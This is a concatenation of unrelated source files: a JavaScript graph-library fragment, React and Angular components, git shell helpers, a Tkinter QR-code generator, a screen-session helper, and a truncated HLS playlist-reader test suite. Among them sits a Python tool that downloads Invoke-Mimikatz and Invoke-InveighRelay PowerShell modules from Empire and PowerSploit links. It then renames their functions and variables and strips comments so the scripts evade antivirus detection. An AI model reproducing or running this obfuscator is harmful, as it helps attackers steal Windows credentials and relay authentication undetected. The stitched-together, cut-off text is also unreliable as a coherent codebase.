    window.removeEventListener('mouseup', viewX.graphDragUpEvent)
    window.removeEventListener('touchmove', viewX.graphDragMoveEvent)
    window.removeEventListener('touchend', viewX.graphDragUpEvent)
    // window.removeEventListener('mouseout', viewX.pointUpEvent)
    // runFunctionOnDragEnd is an eval()'d string configured per graph.
    eval(viewX.graphData[gphname].runFunctionOnDragEnd)
    viewX.currentMovingGraph.style.cursor = 'auto'
}
// Handler used to suppress default touch behavior (e.g. page scrolling).
viewX.graphTouchDisable = function(event) {
    event.preventDefault()
}
// Rough display-mode classification from the window aspect ratio: 'square'
// unless clearly portrait (height > 1.25 * width) or landscape
// (width > 1.3 * height).
dmode = 'square'
if (1.25*window.innerWidth < window.innerHeight && window.innerWidth < window.innerHeight) {
    dmode = 'portrait'
}
else if (window.innerWidth > 1.3*window.innerHeight && window.innerWidth > window.innerHeight) {
    dmode = 'landscape'
}
// Apply a font size to every element id in divCollection.
viewX.setFont = function(divCollection, fontval) {
    // 'let' keeps the index local instead of leaking an implicit global.
    for (let divN = 0; divN < divCollection.length; divN++) {
        document.getElementById(divCollection[divN]).style.fontSize = fontval
    }
}
// Euclidean distance between two [x, y] points.
viewX.distF = function(pt1, pt2) {
    return Math.pow(Math.pow(pt1[0] - pt2[0], 2) + Math.pow(pt1[1] - pt2[1], 2), 0.5)
}
// Component-wise sum of two [x, y] vectors.
viewX.addVec = function(pt1, pt2) {
    return [pt1[0] + pt2[0], pt1[1] + pt2[1]]
}
// Unit vector pointing from pt1 to pt2.
viewX.directionVec = function(pt1, pt2) {
    const diff = [pt2[0] - pt1[0], pt2[1] - pt1[1]]
    const difflen = viewX.distF(diff, [0,0])
    return [diff[0]/difflen, diff[1]/difflen]
}
// Rotate a 2D vector by `angle` degrees.
viewX.rotatedVec = function(ofVector, angle) {
    // Locals instead of the original's implicit globals rotatedXV/rotatedYV.
    const radians = angle*Math.PI/180;
    const rotatedXV = ofVector[0]*Math.cos(radians) - ofVector[1]*Math.sin(radians);
    const rotatedYV = ofVector[0]*Math.sin(radians) + ofVector[1]*Math.cos(radians);
    return [rotatedXV, rotatedYV]
}
// Magnitude (modulus) of a 2D vector.
viewX.mod = function(ofVector) {
    return viewX.distF(ofVector, [0,0])
}
// Fisher-Yates shuffle, in place; returns the same array for chaining.
viewX.shuffle = function(array) {
    // Walk from the end, swapping each slot with a random one at or before it.
    for (let i = array.length - 1; i >= 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        const tmp = array[i];
        array[i] = array[j];
        array[j] = tmp;
    }
    return array;
}
// Shared library state: unique-id counter, per-graph data registry,
// element-id -> [graphname, elementname] reverse lookup, and dark-mode flag.
viewX.uid = 0
viewX.graphData = {}
viewX.reverseGraphElementMap = {}
// Trailing concatenation artifact ("|") removed — it was a syntax error.
viewX.darkmode = false;
<filename>src/js/components/deployments/deploymentstatus.js
import React from 'react';
// Zeroed per-status device counts, used as a stand-in until the deployment's
// real stats arrive via props.
const defaultStats = {
  success: 0,
  decommissioned: 0,
  pending: 0,
  failure: 0,
  downloading: 0,
  installing: 0,
  rebooting: 0,
  noartifact: 0,
  aborted: 0,
  'already-installed': 0
};
// Displays the per-status device counts of a deployment as a five-phase bar
// and polls refreshStatus every 10s while its tab is active.
export default class DeploymentStatus extends React.PureComponent {
  componentDidUpdate(prevProps) {
    var self = this;
    // Deployment changed: fetch stats for the new id right away.
    if (prevProps.id !== self.props.id) {
      self.props.refreshStatus(self.props.id);
    }
    // Stop polling whenever this tab is not the active one.
    if (!self.props.isActiveTab) {
      clearInterval(self.timer);
    }
    // isActive has changed: (re)start polling when the tab becomes active.
    if (!prevProps.isActiveTab && self.props.isActiveTab && self.props.refresh) {
      self.timer = setInterval(() => self.props.refreshStatus(self.props.id), 10000);
    }
    if (
      prevProps.stats !== self.props.stats &&
      self.props.stats &&
      self.props.stats.downloading + self.props.stats.installing + self.props.stats.rebooting + self.props.stats.pending <= 0
    ) {
      // if no more devices in "progress" statuses, send message to parent that it's finished
      clearInterval(self.timer);
      self.props.setFinished(true);
    }
  }
  componentDidMount() {
    var self = this;
    // Start the 10s poll (when enabled) and do an immediate first fetch.
    if (self.props.refresh) {
      self.timer = setInterval(() => self.props.refreshStatus(self.props.id), 10000);
    }
    self.props.refreshStatus(self.props.id);
  }
  componentWillUnmount() {
    // Ensure the poll timer never outlives the component.
    clearInterval(this.timer);
  }
  render() {
    let { stats } = this.props;
    stats = stats ? stats : defaultStats;
    // Collapse the raw statuses into the five phases shown in the bar.
    var inprogress = stats.downloading + stats.installing + stats.rebooting;
    var failed = stats.failure;
    var skipped = stats.aborted + stats.noartifact + stats['already-installed'] + stats.decommissioned;
    const phases = [
      { title: 'Skipped', value: skipped, className: 'skipped' },
      { title: 'Pending', value: stats.pending, className: 'pending' },
      { title: 'In progress', value: inprogress, className: 'inprogress' },
      { title: 'Successful', value: stats.success, className: 'success' },
      { title: 'Failed', value: failed, className: 'failure' }
    ];
    return (
      <div>
        <div className={this.props.vertical ? 'results-status vertical' : 'results-status'}>
          {phases.map(phase => (
            <div key={phase.className} className={phase.value ? 'hint--bottom' : 'hint--bottom disabled'} aria-label={phase.title}>
              <span className={`status ${phase.className}`}>{(phase.value || 0).toLocaleString()}</span>
              {this.props.vertical && <span className="label">{phase.title}</span>}
            </div>
          ))}
        </div>
      </div>
    );
  }
}
|
var SCOPES = {
user: [
'username',
'avatar',
'id',
'prefLocale'
],
email: [
'email'
]
};
module.exports = {
filterUserForScopes: function(user, scopes) {
var filtered = {};
scopes.forEach(function(scope) {
var scopeAttrs = SCOPES[scope];
if ( scopeAttrs ) {
scopeAttrs.forEach(function(attr) {
filtered[attr] = user[attr];
});
}
});
filtered.scope = scopes;
return filtered;
}
};
|
# Update all gems, run the test suite, then commit and push the lockfile change.
function bunmit() {
    echo "Checking gems to update..."
    bundle update && bundle exec rake test && git add Gemfile Gemfile.lock && git commit -m "Gem update" && git push
    echo "Update done"
}
# Push master/develop/tags to origin, then master to the "fury" remote.
function furypush() {
    echo "Fury pushing..."
    git push origin master && git push origin develop && git push --tags && git push fury master
    echo "Fury pushed"
}
# Delete local branches whose upstream on origin is gone (safe delete: -d
# refuses branches with unmerged work).
function gdl() {
    echo -e "Deleting remoteless local git branches..."
    git fetch -p && git branch -vv | grep 'origin/.*: gone]' | awk '{print $1}' | xargs git branch -d
    echo -e "Deleting local branches"
}
# Same as gdl but force-deletes (-D), discarding unmerged work.
function gfdl() {
    echo -e "Force deleting remoteless local git branches..."
    git fetch -p && git branch -vv | grep 'origin/.*: gone]' | awk '{print $1}' | xargs git branch -D
    echo -e "Force deleting local branches"
}
|
/** Credentials payload exchanged with the authentication endpoint. */
export class CredentialsDto {
  // Account name the token belongs to.
  username: string;
  // Signed JWT to present as the bearer token on subsequent requests.
  jwtToken: string;
}
|
import { Component, OnInit, Input } from '@angular/core';
import { MenuItem } from '@core/modelo/menu-item';
import { Comercio } from '@shared/modelo/comercio';
import { ComercioService } from '@shared/service/comercio.service';
import { Observable } from 'rxjs';
// Top navigation bar: renders the supplied menu items plus a commerce
// selector backed by ComercioService.
@Component({
  selector: 'app-navbar',
  templateUrl: 'navbar.component.html',
  styles: [],
})
export class NavbarComponent implements OnInit {
  // Stream of commerces for the dropdown (consumed in the template).
  public listaComercios: Observable<Comercio[]>;
  // Label of the currently selected commerce (placeholder until one is chosen).
  public comercioSeleccionado: string;
  @Input()
  items: MenuItem[];
  constructor(protected comercioService: ComercioService) { }
  ngOnInit() {
    this.comercioSeleccionado = 'Seleccione un comercio';
    this.listaComercios = this.comercioService.consultar();
  }
  // Record the chosen commerce in the shared service and update the label.
  seleccionarComercio(comercio: Comercio): void {
    this.comercioService.seleccionar(comercio);
    this.comercioSeleccionado = comercio.nombre;
  }
}
|
<gh_stars>1-10
#!/usr/bin/python
import os, sys, re, random, argparse
import requests, OpenSSL, string
from argparse import RawTextHelpFormatter
from classes.bcolours import *
from classes.banner import *
#
# Invoke-mimikatz.ps1 obfuscator
# Download Mimikatz Powershell module, change variable names, remove comments etc.
# pip install requests==2.11.1
# Global variables:
__author__ = "<NAME> (loneferret)"
__license__ = "Apache License 2.0"
__version__ = "0.2.1"
__status__ = "Prototype"
#Passed URLs:
#MIMIURL = 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'
#MIMIURL = 'https://goo.gl/TRkLKn'
#Current URLs:
#MIMIURL = 'https://raw.githubusercontent.com/EmpireProject/Empire/2.0_beta/data/module_source/credentials/Invoke-Mimikatz.ps1'
#INVEIGHRELAY = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-InveighRelay.ps1'
MIMIURL = 'https://goo.gl/s18PdR'
INVEIGHRELAY = 'https://goo.gl/1507jm'
# Fallback URL offered when the user picks neither bundled script.
TEST = 'http://1192.168.127.12:8000/test.ps1'
PSHscript = ''
# List of variable names to ignore in hopes not to break stuff
IGNORE = ['$true','$false','Main','Invoke','$True','$False','$_','$args','$Bytes', #'Get',
'$ExeArgs', '$Win32Constants','Win32Constants','Win32Functions','$Win32Functions',
'Get-PEBasicInfo','$PEBytes', '$PEHandle','PEHandle','$PELoadedInfo','ExeArgs',
'$Win32Types','Win32Types','PEInfo','$PEInfo','$StartAddress','StartAddress',
'Size','$Size','$OriginalImageBase','OriginalImageBase']
"""
TODO:
High:
- Still don't like how I'm chaning variable names
- Fine tune the comments regex - DONE
- Get that Invoke thing out of the way if not needed - DONE (kinda)
"""
def writeNewFile(newContent):
    # Write the obfuscated Powershell lines to obfuscated.ps1, one per line.
    # Uses a context manager so the handle is always closed (the original used
    # the Python-2-only file() builtin and leaked the open handle).
    with open('obfuscated.ps1', 'w') as newPSH:
        for i in newContent:
            newPSH.write(str(i) + "\n")
    return True
def removeEmptyLines(content):
    # Keep only lines that still contain non-whitespace characters.
    return [line for line in content if line.strip()]
def makeRandom(size=8, chars=string.ascii_uppercase + string.ascii_lowercase):
    # Random identifier of `size` characters drawn (with replacement) from `chars`.
    picked = [random.choice(chars) for _ in range(size)]
    return ''.join(picked)
def replaceFunctionCalls(content, oldName, newName):
    # When the captured name kept its closing parenthesis, re-append "()" to
    # the replacement; otherwise substitute the bare name.
    replacement = newName + '()' if oldName.endswith(')') else newName
    return [line.replace(oldName, replacement) for line in content]
def checkIgnoreWords(wordcheck):
    # True when none of the protected IGNORE tokens occur inside the candidate.
    return not any(word in wordcheck for word in IGNORE)
def getFunctionNames(content):
    # Scan for `function <name>` definitions, assign each a random replacement
    # name, and rewrite the definition lines in place.
    # Returns (rewritten_lines, {original_name: new_name}).
    replaceList = {}
    newlines = []
    for i in content:
        pattern = re.search('^\s*[f|F]unction\s(.*\w$)', i)
        if (pattern):
            if (checkIgnoreWords(pattern.group(1))):
                functionName = pattern.group(1)
                newName = makeRandom()
                replaceList[functionName] = newName
                # Definitions carrying a parameter list keep their "( ... )".
                if(functionName.endswith(')')):
                    parenValues = re.search('\((.+)\)', functionName) # \((.+)\) <-- regex to find (...)
                    # NOTE(review): parenValues is a Match object (or None), so
                    # `parenValues not in IGNORE` is always True, and .group(1)
                    # raises when "()" is empty — confirm intended behavior.
                    if(parenValues not in IGNORE):
                        newlines.append(i.replace(functionName,newName+'('+parenValues.group(1)+')'))
                    else:
                        newlines.append(i.replace(functionName,newName+'()'))
                else:
                    newlines.append(i.replace(functionName,newName))
            else:
                newlines.append(i)
        else:
            newlines.append(i)
    return newlines, replaceList
def deleteLines(start, end, content):
    # Drop 1-based lines start..end inclusive, i.e. keep index i only when it
    # lies outside [start-1, end). deleteLines(0, 0, xs) leaves xs unchanged.
    return [line for i, line in enumerate(content) if i < start - 1 or i >= end]
def removeComments(content):
    # Drop whole-line comments: lines whose first non-blank character is '#'.
    # Inline trailing comments are intentionally left alone.
    comment_line = re.compile(r'^\s*#')
    return [line for line in content if not comment_line.search(line.rstrip())]
def removeBlockComments(mimi):
    # Strip a <# ... #> block comment from the downloaded script text.
    # Records the LAST line starting with '<#' and the LAST line starting with
    # '#>' and deletes that span. With no block comment both markers stay 0
    # and deleteLines(0, 0, ...) returns the lines unchanged.
    # NOTE(review): only the final block is removed, and an unterminated block
    # leaves first > second — confirm inputs only ever carry one well-formed
    # header block.
    mimiLines = mimi.splitlines()
    commentsRemoved = ''
    first = 0
    second = 0
    for num, line in enumerate(mimiLines, 1):
        if (line.startswith('<#')):
            first = num
        if (line.startswith('#>')):
            second = num
    commentsRemoved = deleteLines(first, second, mimiLines)
    return commentsRemoved
def replaceVariableNames(content, oldName, newName):
    # oldName already carries its '$' sigil; the replacement needs one added.
    sigiled = '$' + newName
    return [line.replace(oldName, sigiled) for line in content]
def getVariablesNames(content):
    # Collect candidate $variable names (skipping protected IGNORE tokens),
    # then map each unique one to a freshly generated random alias.
    found = []
    for line in content:
        match = re.search('(\$\w+)[-\s=|\s=]', line)
        if match and match.group(1) not in IGNORE:
            found.append(match.group(1))
    return {name: makeRandom() for name in set(found)}
def getTargetPSH(url):
    # Download the target Powershell script and report whether its text
    # mentions an "Invoke-" entry point. Returns (script_text, has_invoke).
    invoke = False
    orgPSH = requests.get(url, stream=True)
    orgPSH.raw.decode_content = True
    # NOTE(review): under Python 3 `.content` is bytes, so this substring test
    # would need b"Invoke-" — this module targets Python 2.
    if("Invoke-" in orgPSH.content):
        invoke = True
    return orgPSH.content,invoke
def printUsage():
    # Build the example-usage blurb appended to the --help description.
    prog = sys.argv[0]
    lines = [
        '',
        'Example Usage: ',
        '\t' + prog + ' --psh InveighRelay',
        '\t' + prog + ' -p Mimikatz',
    ]
    return '\n'.join(lines) + '\n'
def description():
    # Multi-line program description shown by argparse --help (rendered
    # verbatim via RawTextHelpFormatter). Pulls the module dunder metadata and
    # appends the usage examples from printUsage().
    desc = "\n"
    desc += ("Simple & Convoluted Powershell obfuscation tool v%s: \n" % __version__)
    desc += ("Grabs a Powershell script from the tubes, remplaces function names & calls\n")
    desc += ("To randomly generated string, and removes block comments & empty lines.\n")
    desc += ("\t* Currently changes function name.\n")
    desc += ("\t* Does variable but could be better.\n\n")
    desc += ("Author: %s \n" % __author__)
    desc += ("License: %s \n" % __license__)
    desc += ("Status: %s \n" % __status__)
    desc += ("You can experiment and try the script on some of these examples here:\n")
    desc += ("http://www.robvanderwoude.com/powershellexamples.php\n")
    desc += printUsage()
    return desc
def main():
    # CLI entry point: choose a script URL, download it, run the obfuscation
    # pipeline, and write obfuscated.ps1 to the working directory.
    # This module is Python 2 (print statements, raw_input).
    # NOTE(review): NUMFUNCTIONNAMES/NUMVARIABLES are declared global but never
    # assigned in this chunk — confirm they are still used.
    global NUMFUNCTIONNAMES, NUMVARIABLES
    parser = argparse.ArgumentParser(description=description(), formatter_class=RawTextHelpFormatter)
    parser.add_argument('--psh', '-p', dest='pshScript', required=True, help='Available scripts to download:\n- Mimikatz\n- InveighRelay')
    args = parser.parse_args()
    print banners.smallSlant
    if(args.pshScript == 'Mimikatz'):
        url = MIMIURL
    elif(args.pshScript == 'InveighRelay'):
        url = INVEIGHRELAY
    else:
        url = raw_input("[+] Enter URL [http://127.0.0.1:8000/test.ps1]: ") or TEST
    print("[-] Fetching from: " + bcolours.GREEN + url + bcolours.ENDC)
    # Pipeline: strip block comments, blank lines and whole-line comments,
    # then rename functions and variables.
    PSHscript, invoke = getTargetPSH(url)
    PSHscript = removeBlockComments(PSHscript)
    PSHscript = removeEmptyLines(PSHscript)
    PSHscript = removeComments(PSHscript)
    PSHscript, dictListFunctions = getFunctionNames(PSHscript)
    for key in dictListFunctions:
        PSHscript = replaceFunctionCalls(PSHscript, key, dictListFunctions[key])
    dictListVars = getVariablesNames(PSHscript)
    for key in dictListVars:
        PSHscript = replaceVariableNames(PSHscript, key, dictListVars[key])
    if(invoke):
        # Cheap way to find if Invoke- is in the file
        newFunctionName = raw_input("[+] What name do you want the main function to be called [default is random]:") or makeRandom()
        PSHscript = replaceFunctionCalls(PSHscript, 'Invoke-'+args.pshScript, 'Invoke-' + newFunctionName)
        print("[-] New function name: " + bcolours.GREEN + "Invoke-"+newFunctionName+bcolours.ENDC)
    print("[-] Number of functions renamed: " + bcolours.GREEN + str(len(dictListFunctions)) + bcolours.ENDC)
    print("[-] Number of variables renamed: " + bcolours.GREEN + str(len(dictListVars)) + bcolours.ENDC)
    writeNewFile(PSHscript)
if __name__ == '__main__':
    # start
    main()
|
from tkinter import *
# import os
import qrcode
from PIL import Image, ImageTk
from resizeimage import resizeimage
# QR Code Generator | Designed by <NAME>
class Qr_Genrator():
def __init__(self, root):
self.root=root
self.root.title("QR Code Generator")
self.root.geometry('900x500+200+50')
self.root.resizable(False, False)
title = Label(self.root,text=" QR Code Genrator", font=("time new roman",40), bg="#F96900", fg="white", anchor="w").place(x=0,y=0,relwidth=1)
# Variable
self.var_emp_code=StringVar()
self.var_name=StringVar()
self.var_department=StringVar()
self.var_designation=StringVar()
# Employee detail window design
emp_Frame=Frame(self.root,bd=2, relief=RIDGE,bg="white")
emp_Frame.place(x=50, y=100, width=500, height=380)
emp_title = Label(emp_Frame,text=" Employee Details", font=("goudy old style",20), bg="#FB9316", fg="white").place(x=0,y=0,relwidth=1)
lbl_emp_code = Label(emp_Frame,text=" Employee ID", font=("time new roman",15), bg="white").place(x=20,y=60)
lbl_emp_name = Label(emp_Frame,text=" Name", font=("time new roman",15), bg="white").place(x=20,y=100)
lbl_emp_dept = Label(emp_Frame,text=" Department", font=("time new roman",15), bg="white").place(x=20,y=140)
lbl_emp_designation = Label(emp_Frame,text=" Designation", font=("time new roman",15), bg="white").place(x=20,y=180)
text_emp_code = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_emp_code, bg="lightyellow").place(x=200,y=60)
text_emp_name = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_name, bg="lightyellow").place(x=200,y=100)
text_emp_dept = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_department, bg="lightyellow").place(x=200,y=140)
text_emp_designation = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_designation, bg="lightyellow").place(x=200,y=180)
btn_genrator = Button(emp_Frame, text="QR Genrator", command=self.genrate, font=("time new roman", 15, "bold"), bg="#2196f3", fg="white").place(x=90, y=250, width=180, height="30")
btn_clear = Button(emp_Frame, text="Clear", command=self.clear, font=("time new roman", 15, "bold"), bg="#2196f3", fg="white").place(x=290, y=250, width=120, height="30")
self.msg=""
self.lbl_msg = Label(emp_Frame, text=self.msg, font=("time new roman",15), bg="white", fg="green")
self.lbl_msg.place(x=0,y=320, relwidth=1)
# Qr Code window design
qr_Frame=Frame(self.root,bd=2, relief=RIDGE,bg="white")
qr_Frame.place(x=600, y=100, width=250, height=380)
emp_title = Label(qr_Frame,text="Employee QR code", font=("goudy old style",15), bg="#FB9316", fg="white").place(x=0,y=0,relwidth=1)
self.qr_code = Label(qr_Frame, text="No QR\n available", font=("time new roman",15), bg="#D76C02", fg="white", bd=1, relief=RIDGE)
self.qr_code.place(x=35, y=100, width=180, height=180)
def clear(self):
    """Reset all form fields, the status message and the QR preview."""
    self.var_emp_code.set('')
    self.var_name.set('')
    self.var_department.set('')
    self.var_designation.set('')
    # Blank the status label as well.
    self.msg=""
    self.lbl_msg.config(text=self.msg)
    # Drop the displayed QR image (label falls back to its placeholder text).
    self.qr_code.config(image='')
def genrate(self):
    """Generate a QR code from the form fields and show it in the preview.

    Shows a red error message when any field is empty; otherwise builds
    the QR image, saves it under ./QR-code-Genrator/employee_qr/ and
    updates the preview label and status message.
    """
    if self.var_emp_code.get() == '' or self.var_name.get() == '' or self.var_department.get() == '' or self.var_designation.get() == '':
        # Typo fix: "filed" -> "fields" in the user-facing error message.
        self.msg = "All fields required !!!"
        self.lbl_msg.config(text=self.msg, fg="red")
    else:
        qr_data = (f"Employee Id:{self.var_emp_code.get()}\nEmployee Name:{self.var_name.get()}\nDepartment:{self.var_department.get()}\nDesignation:{self.var_designation.get()}")
        qr_code = qrcode.make(qr_data)
        # print(qr_code)
        qr_code = resizeimage.resize_cover(qr_code, [180, 180])
        # BUG FIX: the image was saved under './QR-code-Genrator/...' but
        # loaded from '../QR-code-Genrator/...', so the freshly written file
        # could not be found.  Use a single path for both operations.
        img_path = './QR-code-Genrator/employee_qr/emp_' + str(self.var_emp_code.get()) + '.png'
        qr_code.save(img_path)
        # qr code img update — keep a reference on self so Tk does not
        # garbage-collect the PhotoImage.
        self.im = ImageTk.PhotoImage(file=img_path)
        self.qr_code.config(image=self.im)
        # updating noti
        self.msg = "QR genrated Successful!!"
        self.lbl_msg.config(text=self.msg, fg="green")
# Script entry point: build the main window, attach the application
# object and start the Tk event loop (blocks until the window closes).
root = Tk()
obj = Qr_Genrator(root)
root.mainloop()
|
# $EDITOR
# Use Neovim as the default editor for programs that honor $EDITOR.
export EDITOR=nvim
|
import subprocess
def start_screen_session(session_name, script_path):
    """Launch `script_path` with python inside a new detached screen session."""
    command = ['screen', '-d', '-m', '-S', session_name, 'python', script_path]
    subprocess.run(command)
def list_screen_sessions():
    """Print the output of `screen -ls` (all screen sessions known to screen)."""
    completed = subprocess.run(['screen', '-ls'], capture_output=True, text=True)
    print(completed.stdout)
def terminate_screen_session(session_name):
    """Ask screen to quit the named session."""
    command = ['screen', '-X', '-S', session_name, 'quit']
    subprocess.run(command)
# Example usage
# NOTE: these calls run at import time and require `screen` on PATH;
# they start, list and immediately terminate a 'TwitterMiner' session.
start_screen_session('TwitterMiner', 'Collector.py')
list_screen_sessions()
terminate_screen_session('TwitterMiner')
<reponame>kanongil/hls-playlist-reader
'use strict';
const Events = require('events');
const Fs = require('fs');
const Os = require('os');
const Path = require('path');
const Url = require('url');
const Boom = require('@hapi/boom');
const Code = require('@hapi/code');
const Hoek = require('@hapi/hoek');
const Lab = require('@hapi/lab');
const M3U8Parse = require('m3u8parse');
const Shared = require('./_shared');
const { createReader, HlsPlaylistReader } = require('..');
const { AttrList } = require('m3u8parse/lib/attrlist');
// Declare internals
const internals = {};
// Test shortcuts
const lab = exports.lab = Lab.script();
const { after, before, describe, it } = lab;
const { expect } = Code;
describe('HlsPlaylistReader()', () => {
// Collect every playlist object an HlsPlaylistReader emits for a URL.
const readPlaylists = Shared.readSegments.bind(null, HlsPlaylistReader);
let server;
before(async () => {
server = await Shared.provisionServer();
return server.start();
});
after(() => {
return server.stop();
});
describe('constructor', () => {
it('creates a valid object', async () => {
const r = new HlsPlaylistReader('http://localhost:' + server.info.port + '/simple/500.m3u8', {
extensions: null,
maxStallTime: null
});
const closed = Events.once(r, 'close');
expect(r).to.be.instanceOf(HlsPlaylistReader);
await Hoek.wait(10);
r.destroy();
await closed;
});
it('supports URL objects', () => {
const url = 'http://localhost:' + server.info.port + '/simple/500.m3u8';
expect(new HlsPlaylistReader(new URL(url)).destroy()).to.be.instanceOf(HlsPlaylistReader);
});
it('throws on missing uri option', () => {
const createObject = () => {
return new HlsPlaylistReader();
};
expect(createObject).to.throw();
});
it('throws on invalid uri option', () => {
const createObject = () => {
return new HlsPlaylistReader('asdf://test');
};
expect(createObject).to.throw();
});
});
it('can be created through helper', () => {
const url = 'http://localhost:' + server.info.port + '/simple/500.m3u8';
expect(createReader(url).destroy()).to.be.instanceOf(HlsPlaylistReader);
expect(createReader(new URL(url)).destroy()).to.be.instanceOf(HlsPlaylistReader);
});
it('emits error on missing remote host', async () => {
const promise = readPlaylists('http://does.not.exist/simple/500.m3u8');
await expect(promise).to.reject(Error, /getaddrinfo ENOTFOUND does\.not\.exist/);
});
it('emits error for missing data', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/notfound`);
await expect(promise).to.reject(Error, /Not Found/);
});
it('emits error for http error responses', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/error`);
await expect(promise).to.reject(Error, /Internal Server Error/);
});
it('emits error on non-index responses', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/simple/500.mp4`);
await expect(promise).to.reject(Error, /Invalid MIME type/);
});
it('emits error on malformed index files', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/simple/malformed.m3u8`);
await expect(promise).to.reject(M3U8Parse.ParserError);
});
describe('canUpdate()', () => {
it('returns true before index is received', () => {
const reader = new HlsPlaylistReader('http://localhost:' + server.info.port + '/simple/500.m3u8');
expect(reader.index).to.not.exist();
expect(reader.canUpdate()).to.be.true();
reader.destroy();
});
it('returns false when destroyed', () => {
const reader = new HlsPlaylistReader('http://localhost:' + server.info.port + '/simple/500.m3u8');
reader.destroy();
expect(reader.index).to.not.exist();
expect(reader.canUpdate()).to.be.false();
});
});
describe('master index', () => {
it('stops after reading index', async () => {
const playlists = await readPlaylists(`http://localhost:${server.info.port}/simple/index.m3u8`);
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
expect(playlists[0].playlist).to.not.exist();
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.true();
expect(index.variants[0].uri).to.exist();
});
it('supports a data: url', async () => {
const buf = await Fs.promises.readFile(Path.join(__dirname, 'fixtures', 'index.m3u8'));
const playlists = await readPlaylists('data:application/vnd.apple.mpegurl;base64,' + buf.toString('base64'));
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
expect(playlists[0].playlist).to.not.exist();
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.true();
expect(index.variants[0].uri).to.exist();
});
});
describe('on-demand index', () => {
it('stops after reading index', async () => {
const playlists = await readPlaylists(`http://localhost:${server.info.port}/simple/500.m3u8`);
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.false();
expect(index.segments[0].uri).to.exist();
});
it('supports a data: url', async () => {
const buf = await Fs.promises.readFile(Path.join(__dirname, 'fixtures', '500.m3u8'));
const playlists = await readPlaylists('data:application/vnd.apple.mpegurl;base64,' + buf.toString('base64'));
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.false();
expect(index.segments[0].uri).to.exist();
});
it('applies the extensions option', async () => {
const extensions = {
'#EXT-MY-HEADER': false,
'#EXT-MY-SEGMENT-OK': true
};
const r = new HlsPlaylistReader('file://' + Path.join(__dirname, 'fixtures', '500.m3u8'), { extensions });
const playlists = [];
for await (const obj of r) {
playlists.push(obj);
}
expect(playlists).to.have.length(1);
const { index } = playlists[0];
expect(index).to.exist();
expect(index.vendor[0]).to.equal(['#EXT-MY-HEADER', 'hello']);
expect(index.segments[1].vendor[0]).to.equal(['#EXT-MY-SEGMENT-OK', null]);
});
it('can be destroyed', async () => {
const r = new HlsPlaylistReader('file://' + Path.join(__dirname, 'fixtures', '500.m3u8'));
const playlists = [];
for await (const obj of r) {
playlists.push(obj);
r.destroy();
}
expect(playlists).to.have.length(1);
});
it('can be destroyed before read()', async () => {
const r = new HlsPlaylistReader('file://' + Path.join(__dirname, 'fixtures', '500.m3u8'));
const playlists = [];
while (!r.playlist) {
await Hoek.wait(1);
}
r.destroy();
for await (const obj of r) {
playlists.push(obj);
}
expect(playlists).to.have.length(0);
});
// handles all kinds of segment reference url
// handles .m3u files
});
describe('live index', { parallel: false }, () => {
const serverState = { state: {} };
let liveServer;
// Build a reader for the live-server endpoint for one test case.
// getUpdateInterval() is stubbed to record each computed interval in
// reader._intervals while returning undefined, so the reader polls
// immediately and live tests run fast.
const prepareLiveReader = function (readerOptions = {}, state = {}) {
    const reader = new HlsPlaylistReader(`http://localhost:${liveServer.info.port}/live/live.m3u8`, { ...readerOptions });
    reader._intervals = [];
    reader.getUpdateInterval = function (updated) {
        this._intervals.push(HlsPlaylistReader.prototype.getUpdateInterval.call(this, updated));
        return undefined;
    };
    // Reset the shared server state for this test run.
    serverState.state = { firstMsn: 0, segmentCount: 10, targetDuration: 2, ...state };
    return { reader, state: serverState.state };
};
before(() => {
liveServer = Shared.provisionLiveServer(serverState);
return liveServer.start();
});
after(() => {
return liveServer.stop();
});
it('handles a basic stream (http)', async () => {
const { reader, state } = prepareLiveReader();
const playlists = [];
for await (const obj of reader) {
const lastMsn = obj.playlist.index.lastMsn();
expect(lastMsn).to.equal(playlists.length + 9);
playlists.push(obj);
state.firstMsn++;
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
}
expect(playlists).to.have.length(6);
});
it('handles a basic stream (file)', async () => {
const state = serverState.state = { firstMsn: 0, segmentCount: 10, targetDuration: 10 };
const tmpDir = await Fs.promises.mkdtemp(await Fs.promises.realpath(Os.tmpdir()) + Path.sep);
try {
const tmpUrl = new URL('next.m3u8', Url.pathToFileURL(tmpDir + Path.sep));
const indexUrl = new URL('index.m3u8', Url.pathToFileURL(tmpDir + Path.sep));
await Fs.promises.writeFile(indexUrl, Shared.genIndex(state).toString(), 'utf-8');
const reader = new HlsPlaylistReader(indexUrl.href);
const playlists = [];
(async () => {
while (!state.ended) {
await Hoek.wait(50);
state.firstMsn++;
if (state.firstMsn === 5) {
state.ended = true;
}
// Atomic write
await Fs.promises.writeFile(tmpUrl, Shared.genIndex(state).toString(), 'utf-8');
await Fs.promises.rename(tmpUrl, indexUrl);
}
})();
for await (const obj of reader) {
expect(obj.playlist.index.media_sequence).to.equal(playlists.length);
playlists.push(obj);
}
expect(playlists).to.have.length(6);
}
finally {
await Fs.promises.rm(tmpDir, { recursive: true });
}
});
it('emits "error" on a data: url', async () => {
const state = serverState.state = { firstMsn: 0, segmentCount: 10, targetDuration: 10 };
const buf = Buffer.from(Shared.genIndex(state).toString(), 'utf-8');
const reader = new HlsPlaylistReader('data:application/vnd.apple.mpegurl;base64,' + buf.toString('base64'));
const playlists = [];
